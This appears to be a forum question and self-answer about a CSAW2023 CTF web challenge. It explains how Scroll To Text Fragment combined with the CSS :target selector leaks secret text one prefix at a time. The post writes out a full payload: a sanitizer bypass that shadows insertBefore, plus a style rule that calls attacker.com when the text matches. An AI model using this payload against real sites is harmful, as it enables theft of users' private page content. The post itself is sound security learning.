# Understanding Scroll To Text Fragment (STTF) Leak

Tags: html, xss, code-injection, scroll-to-text

The following contains spoliers to CSAW2023 CTF [The CTF is over but I still want to warn]

### Background

---

In the recent CSAW2023 CTF, in a challenge called [rainbow-notes](https://github.com/osirislab/CSAW-CTF-2023-Quals/tree/main/web/rainbow-notes) we're given a website for writing notes, and a link to an admin bot that you can give a URL and it will visit that URL. Before visiting the given URL, it visits the rainbow-notes website and adds a note with the flag: `csawctf{flaghere}`.

The solution (similar to the one referenced in the link but a bit different for convenience) is as follows:

1. First, to bypass a sanitizer function you use a form `<form id="f"><input name="insertBefore">X</form>` and the use of `name="insertBefore` will shadow the insertBefore function and the function that does the sanitization will crash. **THIS IS NOT THE IMPORTANT PART BUT I MENTIONED IT TO AVOID CONFUSION**
2. Now, the important part which I would like to ask about - inside/outside (doesn't matter) the form we place a style block with as follows: `<style>:target{background:url("https://attacker.com/?a=b")}</style>#:~:text=csawctf{a` where we add Scroll To Text Fragment at the end (`#:~:text=`)  where the `a` at the end can be replaced with any prefix of the flag.

The final payload we will send the bot may look like this:

```html
https://rainbow-notes.csaw.io/?note=<form id="f"><input name="insertBefore">X<style>:target{background:url("https://attacker.com/?a=b")}</style></form>#:~:text=csawctf{5af5c57dd6}
```

Now the idea is that if we write a correct prefix of the flag, the Scroll To Text Fragment (STTF) will work and we will call the URL, so now we can slowly brute force the solution.

### The Question

---

I was wondering about how this Scroll To Text Fragment (`#:~:text=`) works. Why does it not call the webhook if there is no matching text to the STTF?

Looking at the [specification](https://chromestatus.com/feature/4733392803332096) of STTF I couldn't find anything that talks about this behavior. I guess this has something to do with the `:target` bit but I don't know.

When I run code with STTF on my own computer, I can find any errors if there's no matching text.

**Update:** following [this](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/) link and reading about the `:target` selector, I'm starting to get a picture of the situation, but I'm still not sure. From what I [understand](https://developer.mozilla.org/en-US/docs/Web/CSS/:target), the `:target` selector is a special one, that is applied to the element referenced in something called the "url fragment", e.g. `http://google.com/index.html#section1` where the fragment is `section1` and the `:target` will reference it.

So in our case `#:~:text=csaw{a` is the URL fragment, and once selected (if it exists!) the code referenced by `:target`, which in our case calls the attacker url, will run, and let us know that this fragment actually exists.

Answer (score 0):

Seems like I got it right in the update I added:

the `:target` pseudo-element is a special one that references the [URI Fragment](https://en.wikipedia.org/wiki/URI_fragment), in our case the STTF. If there is a string matching the one we wrote in the STTF, it will become the part `:target` references, and therefore the `{background:url("https://attacker.com/?a=b")}` code will be execute.

Otherwise (i.e. if there's no matching string) nothing will happen.

Meaning the STTF doesn't throw errors, the trick is simply that the code won't be executed if there's no match.